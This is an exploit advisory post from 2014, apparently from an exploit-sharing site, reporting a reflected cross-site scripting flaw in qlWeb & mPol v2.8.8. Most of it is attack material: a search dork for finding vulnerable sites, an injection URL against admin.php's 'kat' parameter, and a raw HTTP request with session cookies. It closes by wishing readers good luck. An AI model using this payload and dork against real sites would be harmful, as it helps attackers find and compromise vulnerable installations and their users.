facebook facebook twitter rss

qlWeb & mPol v2.8.8 Cross Site Scripting XSS

Author: wlhaan hacker , Published: 04-11-2014
_____________________________________________________
qlWeb & mPol v2.8.8) Cross Site Scripting XSS )

#####################################################
# [+] Author : wlhaan hacker #
# [+] Email : iit@HoTMaiL.coM #
# [+] Site : http://www.qlweb.info/ #
# [+] team wlhaan Hacker #
# [+] Dork : powered by v2.8.8 qlWeb & mPol
# [+]Risk
# [+]High
#####################################################

The exploit :

http://localhost/PATH/admin.php?i=2&kat=10.htaccess.aspx-->">'>'"<vvv000021v687881>



#####################################################
GET /admin.php?i=2&kat=10.htaccess.aspx--%3E%22%3E'%3E'%22%3Cvvv000021v687881%3E HTTP/1.1
Host: HOST
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Vega/1.0
Cookie: PHPSESSID=KdYC3tpXSA9aC-CVuYTLt3; token_ses=hvzk4o
Cookie2: $Version=1
#####################################################

and good luck :D

Thanks to : shooq hacker ..


Discovered By : wlhaan hacker


https://twitter.com/waleedal3ybani

https://www.facebook.com/waleed.alaibani

#####################################################

Like us on Facebook :